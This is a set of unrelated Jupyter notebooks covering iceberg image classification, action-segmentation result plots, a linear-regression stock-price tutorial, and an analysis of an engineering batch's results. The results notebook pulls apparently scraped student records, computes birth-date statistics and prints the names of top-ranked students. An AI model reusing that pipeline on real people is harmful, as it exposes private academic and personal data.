model.add(Dropout(0.25))
model.add(Conv2D(filters = 128, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(filters = 128, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(strides=(2,2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters = 256, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(filters = 256, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(strides=(2,2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(units = 1, activation = 'sigmoid'))
model.compile(optimizer = Adam(lr=1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
return model
model = build_model()
model.summary()
def saveModel(model, run_name):
cwd = os.getcwd()
modelPath = os.path.join(cwd, 'model')
if not os.path.isdir(modelPath):
os.mkdir(modelPath)
weigthsFile = os.path.join(modelPath, run_name + '.h5')
model.save(weigthsFile)
saveModel(model, 'saveModel_test')
# +
def get_lr(x):
lr = round(1e-4 * 0.98 ** x, 6)
if lr < 5e-5:
lr = 5e-5
print(lr, end=' ')
return lr
# annealer = LearningRateScheduler(lambda x: 1e-3 * 0.9 ** x)
annealer = LearningRateScheduler(get_lr)
log_dir = os.path.join(log_path, run_name)
print('log_dir:' + log_dir)
tensorBoard = TensorBoard(log_dir=log_dir)
# -
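The `get_lr` schedule above decays the learning rate by 2% per epoch from 1e-4 and floors it at 5e-5; a standalone restatement of the rule makes the curve easy to probe:

```python
def get_lr(epoch):
    # the scheduler's rule: 2% exponential decay from 1e-4, floored at 5e-5
    lr = round(1e-4 * 0.98 ** epoch, 6)
    return max(lr, 5e-5)

print(get_lr(0))     # 0.0001
print(get_lr(10))    # 8.2e-05
print(get_lr(200))   # 5e-05  (floor reached around epoch 35)
```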
datagen = ImageDataGenerator(
rotation_range=0,
width_shift_range=0,
height_shift_range=0,
horizontal_flip=False,
vertical_flip=False)
# %%time
hist = model.fit_generator(datagen.flow(x_train, y_train, batch_size=8, shuffle = True),
steps_per_epoch=len(x_train) / 8,
epochs = 200, #1 for ETA, 0 for silent
verbose= 1,
max_queue_size= 16,
workers= 8,
validation_data=(x_val, y_val),
callbacks=[annealer, tensorBoard])
# hist = model.fit_generator([x_train, inc_angle_train], y_train,
# batch_size = 8,
# verbose= 1,
# epochs = 30, #1 for ETA, 0 for silent
# validation_data=([x_val, inc_angle_val], y_val),
# callbacks=[tensorBoard])
final_loss, final_acc = model.evaluate(x_val, y_val, verbose=1)
print("Final loss: {0:.4f}, final accuracy: {1:.4f}".format(final_loss, final_acc))
# +
val_prob1 = model.predict(x_val)
# print('Val log_loss: {}'.format(log_loss(y_val, val_prob1)))
val_prob1_limit = np.clip(val_prob1, 0.00005, 0.99995)
loss = log_loss(y_val, val_prob1_limit)
print('Val log_loss: {}'.format(loss))
val_prob1_limit = np.clip(val_prob1_limit, 0.05, 0.95)
loss = log_loss(y_val, val_prob1_limit)
print('Val log_loss: {}'.format(loss))
# -
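Clipping before `log_loss` bounds the per-sample penalty: a prediction clipped to [0.05, 0.95] can cost at most -log(0.05) ≈ 3.0 even when confidently wrong. A numpy illustration on made-up labels (not the notebook's validation data):

```python
import numpy as np

def log_loss_np(y_true, p):
    # mean binary cross-entropy
    p = np.asarray(p, dtype=float)
    return float(np.mean(-(y_true * np.log(p) + (1 - y_true) * np.log(1 - p))))

y = np.array([1, 0, 1, 0])
raw = np.array([0.999, 0.001, 0.0001, 0.9999])   # last two are confidently wrong
clipped = np.clip(raw, 0.05, 0.95)
print(round(log_loss_np(y, raw), 3))       # 4.606 — dominated by the wrong answers
print(round(log_loss_np(y, clipped), 3))   # 1.524
```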
final_acc_str = str(int(loss*10000))
run_name_acc = project_name + '_' + step_name + '_' + time_str + '_' + final_acc_str
print(run_name_acc)
histories = pd.DataFrame(hist.history)
histories['epoch'] = hist.epoch
print(histories.columns)
histories_file = os.path.join(model_path, run_name_acc + '.csv')
histories.to_csv(histories_file, index=False)
plt.plot(histories['loss'], color='b')
plt.plot(histories['val_loss'], color='r')
plt.show()
plt.plot(histories['acc'], color='b')
plt.plot(histories['val_acc'], color='r')
plt.show()
saveModel(model, run_name_acc)
# ## 3. Predict
if not os.path.exists(output_path):
os.mkdir(output_path)
pred_file = os.path.join(output_path, run_name_acc + '.csv')
print(pred_file)
test_prob = model.predict(x_test)
print(test_prob.shape)
print(test_prob[0:2])
test_prob = np.clip(test_prob, 0.05, 0.95)
print(test_prob.shape)
print(test_prob[0:2])
sample_submission['is_iceberg'] = test_prob
print(sample_submission[0:2])
print(sample_submission.shape)
sample_submission.to_csv(pred_file, index=False)
print(run_name_acc)
print('Done!')
|
statoil-iceberg-classifier-challenge/CNN_10channel.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # B.Tech 2016-20 Electrical Engineering (Spring 2018)
# %matplotlib inline
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import datetime as dt
import requests, os, json
# +
stres = "https://result-data.firebaseio.com/.json"
stres += "?auth=" + os.environ["token"]
course = "https://raw.githubusercontent.com/nightawks/scrapper/master/data/course.json"
data = requests.get(url=stres).json()
cdata = requests.get(url=course).json()
#Filter 16EE data
data = {k:v for (k,v) in data.items() if '16EE' in k[:4]}
# with open('../../../data/course.json') as c:
# cdata = json.load(c)
# print ("Total Students: %s" % len(data))
# -
# ## Date of Birth analysis
if len(data) != 0:
dob = [v['dob'] for (k, v) in data.items()]
np_dob = (np.array(dob, dtype='datetime64[s]').view('i8'))
average_dob = np.mean(np_dob).astype('datetime64[s]').astype(dt.datetime)
median_dob = np.median(np_dob).astype('datetime64[s]').astype(dt.datetime)
minimum_dob = np.min(np_dob).astype('datetime64[s]').astype(dt.datetime)
maximum_dob = np.max(np_dob).astype('datetime64[s]').astype(dt.datetime)
    print (" Average: %s" % average_dob.strftime("%B %d, %Y"))
    print ("  Median: %s" % median_dob.strftime("%B %d, %Y"))
    print ("  Oldest: %s" % minimum_dob.strftime("%B %d, %Y"))
    print ("Youngest: %s" % maximum_dob.strftime("%B %d, %Y"))
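The statistics above work because a `datetime64[s]` array viewed as `i8` is just seconds since the epoch, so ordinary numeric reductions apply; a toy check with made-up dates:

```python
import datetime as dt
import numpy as np

dob = ['1998-01-01', '1998-01-03', '1998-01-05']          # made-up birthdays
np_dob = np.array(dob, dtype='datetime64[s]').view('i8')  # seconds since epoch
average = np.mean(np_dob).astype('datetime64[s]').astype(dt.datetime)
print(average.strftime("%B %d, %Y"))   # January 03, 1998
```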
# ## Branch Change Analysis
if len(data) != 0:
    original_strength = 40
    bc_cgpa = [v['cgpa'][1] for (k, v) in data.items() if int(k[-2:]) > original_strength]
bc_cgpa = (np.array(bc_cgpa, dtype='float'))
bc_count = bc_cgpa.size
bc_highest = np.max(bc_cgpa)
bc_lowest = np.min(bc_cgpa)
bc_average = np.mean(bc_cgpa)
bc_median = np.median(bc_cgpa)
print ("Total branch changers: %s" % bc_count)
print ("\nCGPA (after 2nd sem) for branch change:-")
print ("Highest: %s" % bc_highest)
print (" Lowest: %s" % bc_lowest)
print ("Average: %s" % bc_average)
print (" Median: %s" % bc_median)
# ## Course wise analysis
if len(data) != 0:
courses = dict()
for (k, v) in data.items():
for (sem, scourses) in v['grades'].items():
for (course, grade) in scourses.items():
if course not in courses:
courses[course] = list()
courses[course].append(grade)
else:
courses[course].append(grade)
clist = list()
def other_grade(l):
return len(l) - l.count('EX') - l.count('A') - l.count('B') - l.count('C') - l.count('D') - l.count('P') - l.count('F') - l.count('WH')
def analyze_grade(l):
grade_hash = {'EX': 10, 'A': 9, 'B': 8, 'C': 7, 'D': 6, 'P': 5, 'F': 5}
hashed_grade = list()
for grade in l:
if grade in grade_hash:
hashed_grade.append(grade_hash[grade])
hashed_grade = (np.array(hashed_grade, dtype='float'))
if hashed_grade.size == 0:
return {'average': 0, 'median': 0}
return {'average': round(np.mean(hashed_grade), 2), 'median': round(np.median(hashed_grade), 2)}
grade_labels = 'EX', 'A', 'B', 'C', 'D', 'P', 'F', 'WH', 'Other'
colors = ['gold', 'yellowgreen', 'lightcoral', 'lightskyblue', 'orange', 'red', 'gray', 'black']
for course, grades in courses.items():
course_info = cdata[course]
clist.append((course, course_info['subnane'], course_info['credit'], len(grades), grades.count('EX'), grades.count('A'),
grades.count('B'), grades.count('C'), grades.count('D'), grades.count('P'),
grades.count('F'), grades.count('WH'), other_grade(grades), analyze_grade(grades)['average'], analyze_grade(grades)['median']))
# patches, texts = plt.pie([grades.count('EX'), grades.count('A'),
# grades.count('B'), grades.count('C'), grades.count('D'), grades.count('P'),
# grades.count('F'), grades.count('WH'), other_grade(grades)], labels=grade_labels, colors=colors)
# plt.axis('equal')
# plt.legend(patches, labels, loc="best")
# plt.show()
def sortByAverage(element):
return element[-2]
clist.sort(key=sortByAverage)
df = pd.DataFrame(data = clist)
df.columns = ['Subject Code', 'Subject Name', 'Credits', 'Students', 'EX', 'A', 'B', 'C', 'D', 'P', 'F', 'WH', 'Other', 'Average', 'Median']
df
# ## CGPA Analysis
if len(data) != 0:
cgpa = list()
for (k, v) in data.items():
try:
cgpa.append((float(v['cgpa'][-1]), k))
except:
pass
def sortbycg(l):
return l[0]
cgpa.sort(key=sortbycg)
print("Top 5 Students:\n")
for element in cgpa[:-6:-1]:
print('%s' % (data[element[1]]['name']))
cgpa = np.array([element[0] for element in cgpa], dtype='float')
cgpa_average = round(np.mean(cgpa), 2)
cgpa_median = round(np.median(cgpa), 2)
cgpa_highest = round(np.max(cgpa), 2)
print("\nCGPA:")
print("Highest: %s" % cgpa_highest)
print(" Median: %s" % cgpa_median)
print("Average: %s" % cgpa_average)
print(" 9.5+: %s" % len([cg for cg in cgpa if cg >= 9.5]))
print(" 9-9.5: %s" % len([cg for cg in cgpa if cg >= 9 and cg < 9.5]))
print(" 8.5-9: %s" % len([cg for cg in cgpa if cg >= 8.5 and cg < 9]))
print(" 8-8.5: %s" % len([cg for cg in cgpa if cg >= 8 and cg < 8.5]))
print(" 7.5-8: %s" % len([cg for cg in cgpa if cg >= 7.5 and cg < 8]))
print(" 7-7.5: %s" % len([cg for cg in cgpa if cg >= 7 and cg < 7.5]))
print(" 7-: %s" % len([cg for cg in cgpa if cg < 7]))
|
notebooks/year/2016/16EE.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: hasr
# language: python
# name: hasr
# ---
# +
import numpy as np
import os
import sys
import copy
import math
import csv
import torch
import random
import sys
sys.path.append('./backbones/asrf')
from libs import models
from libs.optimizer import get_optimizer
from libs.dataset import ActionSegmentationDataset, collate_fn
from libs.transformer import TempDownSamp, ToTensor
from libs.postprocess import PostProcessor
sys.path.append('./backbones/ms-tcn')
from model import MultiStageModel
sys.path.append('./backbones')
sys.path.append('./backbones/SSTDA')
from SSTDA.model import MultiStageModel as MSM_SSTDA
from src.utils import eval_txts, load_meta
from src.predict import predict_refiner
from src.refiner_train import refiner_train
from src.refiner_model import RefinerModel
from src.mgru import mGRU
import configs.refiner_config as cfg
import configs.sstda_config as sstda_cfg
import configs.asrf_config as asrf_cfg
import matplotlib.pyplot as plt
# -
dataset_names = ['gtea', '50salads', 'breakfast']
backbone_names = ['asrf', 'mstcn', 'sstda', 'mgru']
num_splits = dict()
num_splits['gtea'] = 4
num_splits['50salads']=5
num_splits['breakfast']=4
curr_refiner = 'refinerMSTCN-mstcn'
curr_backbone = 'mstcn'
dataset = 'gtea'
split = 4
# +
record_root = './record'
refiner_best_epoch = dict()
for dir_name in sorted([x for x in os.listdir(record_root) if x[0]!='.']):
backbone_name = ''.join([t for t in dir_name if t.isupper()]).lower()
if len(backbone_name) > 0:
refiner_best_epoch[dir_name] = {dn:[] for dn in dataset_names}
for data_name in os.listdir(os.path.join(record_root, dir_name)):
csv_list = os.listdir(os.path.join(record_root, dir_name, data_name))
plot_flag = True
for i in range(num_splits[data_name]):
if 'split_{}_best.csv'.format(i+1) not in csv_list:
plot_flag = False
if plot_flag:
curr_score = np.asarray([0.0 for _ in range(5)])
backbone_score = np.asarray([0.0 for _ in range(5)])
for i in range(num_splits[data_name]):
curr_csv_fp = os.path.join(record_root, dir_name, data_name, 'split_{}_best.csv'.format(i+1))
backbone_csv_fp = os.path.join(record_root, backbone_name, data_name, 'split_{}_best.csv'.format(i+1))
with open(curr_csv_fp, 'r') as f:
reader = csv.reader(f, delimiter='\t')
for ri, row in enumerate(reader):
if ri>0:
refiner_best_epoch[dir_name][data_name].append(int(row[0]))
curr_score += np.asarray([float(r) for r in row[1:]]) / num_splits[data_name]
# -
device = 'cuda'
actions_dict, \
num_actions, \
gt_path, \
features_path, \
vid_list_file, \
vid_list_file_tst, \
sample_rate,\
model_dir,\
result_dir, \
record_dir = load_meta(cfg.dataset_root, cfg.model_root, cfg.result_root, cfg.record_root,
dataset, split, curr_refiner)
curr_split_dir = os.path.join(cfg.dataset_root, dataset, 'splits')
split_dict = {k+1:[] for k in range(cfg.num_splits[dataset])}
for i in range(cfg.num_splits[dataset]):
curr_fp = os.path.join(curr_split_dir, 'test.split{}.bundle'.format(i+1))
f = open(curr_fp, 'r')
lines = f.readlines()
for l in lines:
curr_name = l.split('.')[0]
split_dict[i+1].append(curr_name)
f.close()
# +
pool_backbones = {bn: {k+1:None for k in range(cfg.num_splits[dataset])} for bn in cfg.backbone_names}
for i in range(cfg.num_splits[dataset]):
if 'asrf' in cfg.backbone_names:
curr_asrf = models.ActionSegmentRefinementFramework(
in_channel = cfg.in_channel,
n_features = cfg.n_features,
n_classes = num_actions,
n_stages = cfg.n_stages,
n_layers = cfg.n_layers,
n_stages_asb = cfg.n_stages_asb,
n_stages_brb = cfg.n_stages_brb
)
curr_asrf.load_state_dict(torch.load(os.path.join(cfg.model_root, 'asrf', dataset,
'split_{}'.format(i+1),
'epoch-{}.model'.format(cfg.best['asrf'][dataset][i]))))
curr_asrf.to(device)
pool_backbones['asrf'][i+1] = curr_asrf
if 'mstcn' in cfg.backbone_names:
curr_mstcn = MultiStageModel(cfg.num_stages,
num_layers = cfg.num_layers,
num_f_maps = cfg.num_f_maps,
dim = cfg.features_dim,
num_classes = num_actions)
curr_mstcn.load_state_dict(torch.load(os.path.join(cfg.model_root, 'mstcn', dataset,
'split_{}'.format(i+1),
'epoch-{}.model'.format(cfg.best['mstcn'][dataset][i]))))
curr_mstcn.to(device)
pool_backbones['mstcn'][i+1] = curr_mstcn
if 'sstda' in cfg.backbone_names:
curr_sstda = MSM_SSTDA(sstda_cfg, num_actions)
curr_sstda.load_state_dict(torch.load(os.path.join(cfg.model_root, 'sstda', dataset,
'split_{}'.format(i+1),
'epoch-{}.model'.format(cfg.best['sstda'][dataset][i]))))
curr_sstda.to(device)
pool_backbones['sstda'][i+1] = curr_sstda
if 'mgru' in cfg.backbone_names:
curr_mgru = mGRU(num_layers=cfg.gru_layers,
feat_dim=cfg.gru_hidden_dim,
inp_dim=cfg.in_channel,
out_dim=num_actions)
curr_mgru.load_state_dict(torch.load(os.path.join(cfg.model_root, 'mgru', dataset,
'split_{}'.format(i+1),
'epoch-{}.model'.format(cfg.best['mgru'][dataset][i]))))
curr_mgru.to(device)
pool_backbones['mgru'][i+1] = curr_mgru
main_backbones = copy.deepcopy(pool_backbones[curr_backbone])
# -
model = RefinerModel(num_actions = num_actions,
input_dim = cfg.features_dim,
feat_dim = cfg.hidden_dim,
num_highlevel_frames = cfg.num_highlevel_frames,
num_highlevel_samples = cfg.num_highlevel_samples,
device = device)
model.load_state_dict(torch.load(os.path.join(cfg.model_root, curr_refiner,
dataset, 'split_{}'.format(split),
'epoch-{}.model'.format(refiner_best_epoch[curr_refiner][dataset][split-1]))))
model.to(device)
# +
def get_segment_idx(segment_res):
segment_time = [0]
segment_ind = [segment_res[0]]
for i, s in enumerate(segment_res):
if s != segment_ind[-1]:
segment_time.append(i)
segment_ind.append(s)
segment_time.append(len(segment_res))
return segment_time, segment_ind
def get_name(ind_list, actions_dict):
name_list = []
for ind in ind_list:
name_list += [key for key in actions_dict if actions_dict[key]==ind]
return name_list
def color_map(N=256, normalized=True):
def bitget(byteval, idx):
return ((byteval & (1 << idx)) != 0)
dtype = 'float32' if normalized else 'uint8'
cmap = np.zeros((N, 3), dtype=dtype)
for i in range(N):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7-j)
g = g | (bitget(c, 1) << 7-j)
b = b | (bitget(c, 2) << 7-j)
c = c >> 3
cmap[i] = np.array([r, g, b])
cmap = cmap/255 if normalized else cmap
return cmap
N = len(actions_dict)
RGB_tuples = color_map(100)
print(N)
# -
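`get_segment_idx` above is a run-length encoding over frame-wise labels, returning segment start indices (plus the total length) and one label per segment; a standalone copy checked on a toy sequence:

```python
def get_segment_idx(segment_res):
    # run-length encode: start indices (plus final length) and one label per run
    segment_time = [0]
    segment_ind = [segment_res[0]]
    for i, s in enumerate(segment_res):
        if s != segment_ind[-1]:
            segment_time.append(i)
            segment_ind.append(s)
    segment_time.append(len(segment_res))
    return segment_time, segment_ind

times, labels = get_segment_idx([0, 0, 1, 1, 1, 2])
print(times)    # [0, 2, 5, 6]
print(labels)   # [0, 1, 2]
```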
def plot_prediction(model, main_backbone_name, backbones, split_dict, model_dir, result_dir, gt_path, features_path, vid_list_file, actions_dict, device, sample_rate):
model.eval()
with torch.no_grad():
file_ptr = open(vid_list_file, 'r')
list_of_vids = file_ptr.read().split('\n')[:-1]
file_ptr.close()
total_seg = 0
total_wrong = 0
for vid in list_of_vids:
print(vid)
f = open(os.path.join(gt_path, vid), 'r')
lines = f.readlines()
gt_segment = []
for l in lines:
gt_segment.append(actions_dict[l[:-1]])
features = np.load(features_path + vid.split('.')[0] + '.npy')
features = features[:, ::sample_rate]
input_x = torch.tensor(features, dtype=torch.float)
input_x.unsqueeze_(0)
input_x = input_x.to(device)
split_idx = 0
for i in range(len(split_dict.keys())):
if vid.split('.')[0] in split_dict[i+1]:
split_idx = i+1
break
curr_backbone = backbones[split_idx]
curr_backbone.eval()
if main_backbone_name != 'asrf':
if main_backbone_name == 'mstcn':
mask = torch.ones(input_x.size(), device=device)
action_pred = curr_backbone(input_x, mask)[-1]
elif main_backbone_name == 'mgru':
action_pred = curr_backbone(input_x)
elif main_backbone_name == 'sstda':
mask = torch.ones(input_x.size(), device=device)
action_pred, _, _, _, _, _, _, _, _, _, _, _, _, _ = curr_backbone(input_x,
input_x,
mask,
mask,
[0, 0],
reverse=False)
action_pred = action_pred[:, -1, :, :]
action_idx = torch.argmax(action_pred, dim=1).squeeze().detach()
else:
out_cls, out_bound = curr_backbone(input_x)
postprocessor = PostProcessor("refinement_with_boundary", asrf_cfg.boundary_th)
refined_output_cls = postprocessor(out_cls.cpu().data.numpy(), boundaries=out_bound.cpu().data.numpy(),
masks=torch.ones(1, 1, input_x.shape[-1]).bool().data.numpy())
action_idx = torch.Tensor(refined_output_cls).squeeze().detach()
_, predictions, _ = model(action_idx.to(device), input_x)
_, predicted = torch.max(predictions.data, 1)
predicted = predicted.squeeze()
backbone_time, backbone_ind = get_segment_idx(action_idx)
backbone_ind = [int(x.item()) for x in backbone_ind]
refine_time, refine_ind = get_segment_idx(predicted)
refine_ind = [x.item() for x in refine_ind]
gt_time, gt_ind = get_segment_idx(gt_segment)
plt.figure(figsize=(15, 5))
plt.axis('off')
thres = 1000000
for i, t in enumerate(gt_time[:-1]):
if t < thres*sample_rate:
plt.plot([t/sample_rate, gt_time[i+1]/sample_rate], [4, 4], linewidth=30, color=RGB_tuples[gt_ind[i]])
for i, t in enumerate(backbone_time[:-1]):
if t < thres:
plt.plot([t, backbone_time[i+1]], [2, 2], linewidth=30, color=RGB_tuples[backbone_ind[i]])
for i, t in enumerate(refine_time[:-1]):
if t < thres:
plt.plot([t, refine_time[i+1]], [0, 0], linewidth=30, color=RGB_tuples[refine_ind[i]])
plt.pause(0.1)
gt_name = get_name(gt_ind, actions_dict)
bb_name = get_name(backbone_ind, actions_dict)
refine_name = get_name(refine_ind, actions_dict)
print(gt_name)
print(bb_name)
print(refine_name)
print('='*80)
plot_prediction(model, curr_backbone, main_backbones,
split_dict, model_dir, result_dir, gt_path, features_path,
vid_list_file_tst, actions_dict, device, sample_rate)
|
show_qualitative_results.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python [Root]
# language: python
# name: Python [Root]
# ---
# # Machine Learning Basics
# ###### <NAME>
# ### 0. Introduction
# #### Machine Learning with scikit-learn
# 
# Scikit-learn (formerly scikits.learn) is a free software machine learning library for the Python programming language. It features various classification, regression and clustering algorithms including support vector machines, random forests, gradient boosting, k-means and DBSCAN, and is designed to interoperate with the Python numerical and scientific libraries NumPy and SciPy.
# ##### A world of possibilities...
# 
# ##### Main objectives of this workshop
# * Provide you with the basic skills for machine learning tasks such as:
# - Supervised Algorithms
# - Linear Regression Model
# - Data Preparation
# ### 1. Remote Data Access
# #### Pandas DataReader
# Functions from pandas.io.data and pandas.io.ga extract data from various Internet sources into a DataFrame. In pandas 0.17.0, the sub-package pandas.io.data will be removed in favor of a separately installable pandas-datareader package. This will allow the data modules to be independently updated to your pandas installation.
# See the pandas-datareader documentation for more details: http://pandas-datareader.readthedocs.org/
# +
# Data Analysis
import numpy as np
import pandas as pd
# Remote Data Access
from pandas_datareader import data, wb
# +
stocks = ['AAPL', 'GOOG', 'YHOO', 'GBP=X', 'SPY', 'JPY=X', 'EUR=X']
wp = data.YahooDailyReader(stocks, '2016-01-01', '2016-08-31').read()
wp
# -
# #### Panel Data
# 
# The term panel data is derived from econometrics and is partially responsible for the name pandas: pan(el)-da(ta)-s. The names for the 3 axes are intended to give some semantic meaning to describing operations involving panel data and, in particular, econometric analysis of panel data. However, for the strict purposes of slicing and dicing a collection of DataFrame objects, you may find the axis names slightly arbitrary:
#
# - items: axis 0, each item corresponds to a DataFrame contained inside
# - major_axis: axis 1, it is the index (rows) of each of the DataFrames
# - minor_axis: axis 2, it is the columns of each of the DataFrames
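# Note that `Panel` was removed in later pandas versions. As a hedged sketch (the tickers and values below are illustrative, not the notebook's data), the same three-axis idea can be reproduced with a dict of DataFrames stacked into a column `MultiIndex` via `pd.concat`:

```python
import numpy as np
import pandas as pd

dates = pd.date_range('2016-01-01', periods=3)
# Each "item" (axis 0) is a DataFrame: rows are the major_axis, columns the minor_axis.
frames = {
    'Open':  pd.DataFrame(np.arange(6.).reshape(3, 2), index=dates, columns=['AAPL', 'GOOG']),
    'Close': pd.DataFrame(np.arange(6., 12.).reshape(3, 2), index=dates, columns=['AAPL', 'GOOG']),
}
# Stacking with keys puts a MultiIndex on the columns -- the modern
# replacement for a Panel and its .to_frame() view.
panel_like = pd.concat(frames, axis=1)
close = panel_like['Close']  # select one item, back to a plain DataFrame
```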
wp.to_frame().head(10)
wp.Close.head()
dataset = wp.Close.ffill().dropna()
dataset.head()
# ### 2. Data Visualization
# Plot
# %matplotlib inline
import matplotlib.pyplot as plt
import matplotlib.ticker as mtick
def plot_model(dataset, title='Plot', xlabel='Date', ylabel='Price'):
# Plot outputs
params = {
'font.family' : 'arial',
'font.style' : 'normal',
'legend.fontsize': 'large',
'figure.figsize': (15, 8),
'axes.labelsize': 'x-large',
'axes.titlesize':'x-large',
'xtick.labelsize':'small',
'ytick.labelsize':'small',
}
plt.rcParams.update(params)
dataset.plot()
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title(title)
plt.xticks(rotation=45)
plot_model(dataset, 'Stocks: Close')
norm_data = dataset / dataset.iloc[0]
plot_model(norm_data, 'Stocks: normalized Close', ylabel='Normalized Close')
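# Dividing by the first row rebases every series to 1.0, which makes relative performance comparable across stocks with very different price levels. A quick toy check (illustrative values):

```python
import pandas as pd

prices = pd.Series([50.0, 55.0, 60.5], name='AAPL')
norm = prices / prices.iloc[0]  # every value is now "growth since day one"
# norm.iloc[0] is exactly 1.0; norm.iloc[2] is 60.5 / 50.0
```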
# ### 3. Machine Learning
# Machine learning is a subfield of computer science that evolved from the study of pattern recognition and computational learning theory in artificial intelligence. In 1959, <NAME> defined machine learning as a "Field of study that gives computers the ability to learn without being explicitly programmed". Machine learning explores the study and construction of algorithms that can learn from and make predictions on data.
# Machine Learning is divided into three major categories:
# - Supervised: All data is labeled and the algorithms learn to predict the output from the input data.
# - Unsupervised: All data is unlabeled and the algorithms learn the inherent structure of the input data.
# - Semi-supervised: Some data is labeled but most of it is unlabeled, and a mixture of supervised and unsupervised techniques can be used.
# #### Supervised Algorithm
# Supervised learning problems can be further grouped into regression and classification problems.
# - Classification: A classification problem is when the output variable is a category, such as “BUY” or “SELL”.
# - Regression: A regression problem is when the output variable is a real value, such as the “Close Price”.
# ##### Linear Regression Model
# Linear Regression is the oldest and most widely used predictive model in the field of machine learning. The goal is to minimize the sum of the squared errors to fit a straight line to a set of data points.
#
#
# The linear regression model fits a linear function to a set of data points. The form of the function is:
#
# $$Y = \beta_0 + \beta_1 X_1 + \beta_2 X_2 + \dots + \beta_n X_n$$
#
#
# where $Y$ is the target variable, $X_1, X_2, \dots, X_n$ are the predictor variables, and $\beta_1, \beta_2, \dots, \beta_n$ are the coefficients that multiply the predictor variables; $\beta_0$ is a constant.
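# As a small self-contained check (synthetic data, illustrative coefficient values), the $\beta$'s can be recovered with ordinary least squares before reaching for scikit-learn:

```python
import numpy as np

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 2))
true_beta = np.array([1.5, -2.0])   # beta_1, beta_2
true_beta0 = 0.5                    # the constant term
y = true_beta0 + X @ true_beta + rng.normal(scale=0.01, size=200)

# Prepend a column of ones so beta_0 is estimated along with the rest.
Xd = np.column_stack([np.ones(len(X)), X])
coef, *_ = np.linalg.lstsq(Xd, y, rcond=None)
```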
from sklearn import linear_model
# +
# define the target
target = 'GOOG'
# prepare the target dataset
dataset_target = dataset.copy()
dataset_target[target] = dataset_target[target].shift(-1)
dataset_target = dataset_target.dropna()
# define the percentage of training dataset ex. 60%
train_ix = len(dataset_target)*60//100
## Split the data into training set
dataset_X_train = dataset_target[:train_ix].drop(target, axis=1)
dataset_y_train = dataset_target[:train_ix][target].to_frame()
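# `shift(-1)` moves tomorrow's price into today's row, so each feature row is paired with the next day's close as its label; the last row then has no label and is dropped. A toy illustration (made-up numbers):

```python
import pandas as pd

df = pd.DataFrame({'GOOG': [10.0, 11.0, 12.0],
                   'AAPL': [1.0, 2.0, 3.0]})
df['GOOG'] = df['GOOG'].shift(-1)  # tomorrow's close becomes today's target
df = df.dropna()                   # the last day has no "tomorrow"
```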
# +
## Create linear regression object
regr = linear_model.LinearRegression()
## Train the model using the training sets
regr.fit(dataset_X_train, dataset_y_train)
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Mean squared error: %.2f"
% np.mean((regr.predict(dataset_X_train) - dataset_y_train) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f'
% regr.score(dataset_X_train, dataset_y_train))
# +
## Split the targets into test set
dataset_X_test = dataset_target[train_ix:].drop(target, axis=1)
dataset_y_test = dataset_target[train_ix:][target].to_frame()
# The coefficients
print('Coefficients: \n', regr.coef_)
# The mean square error
print("Mean squared error: %.2f"
% np.mean((regr.predict(dataset_X_test) - dataset_y_test) ** 2))
# Explained variance score: 1 is perfect prediction
print('Variance score: %.2f'
% regr.score(dataset_X_test, dataset_y_test))
# +
results = dataset_y_test.copy()  # copy so we don't mutate the test set
results['predicted'] = regr.predict(dataset_X_test)
# Plot outputs
plot_model(results[[target, 'predicted']], 'Linear Regression Model')
# -
# Scatter Plot
fit = np.polyfit(results[target], results['predicted'], deg=1)
results.plot(kind='scatter', x=target, y='predicted')
plt.plot(results[target], fit[0] * results[target] + fit[1], color='red')
plt.show()
# +
# LONG & SHORT simulation based on the prediction
results['long'] = results['predicted'].gt(results['predicted'].shift(1))
results['equity'] = results[target].pct_change()
results.loc[results['long'] != True, 'equity'] = results['equity'] * -1
results['strategy'] = results['equity'].cumsum()
results['stock'] = results[target].pct_change().cumsum()
# Profit Loss Plot
ax = results[['strategy', 'stock']].plot(title='Profit Loss')
fmt = '{x:.2%}' # https://pyformat.info/
yticks = mtick.StrMethodFormatter(fmt) # Use the new-style format string
ax.yaxis.set_major_formatter(yticks)
plt.show()
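# The sign flip above is the whole strategy: when the model does not predict a rise we go short, so that day's return enters the P&L with its sign reversed. A reduced sketch of the same logic on toy prices (illustrative values):

```python
import pandas as pd

price = pd.Series([100.0, 101.0, 99.0, 102.0])
predicted = pd.Series([100.5, 101.5, 100.0, 103.0])

long = predicted.gt(predicted.shift(1))   # go long when the forecast rises
equity = price.pct_change()
equity.loc[long != True] = equity * -1    # short days: flip the sign of the return
strategy = equity.cumsum()                # cumulative strategy return
```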
# +
# define the target
target = 'GOOG'
# returns dataset
returns = dataset.loc[:, dataset.columns != target].pct_change().fillna(0)
returns = returns.join(dataset[[target]])
# prepare the target dataset
returns[target] = returns[target].shift(-1)
returns = returns.dropna()
# -
dataset.head()
returns.head()
# +
# define the percentage of training dataset ex. 60%
train_ix = len(returns)*60//100
## Split the data into training set
dataset_X_train = returns[:train_ix].drop(target, axis=1)
dataset_y_train = returns[:train_ix][target].to_frame()
## Create linear regression object
regr = linear_model.LinearRegression()
## Train the model using the training sets
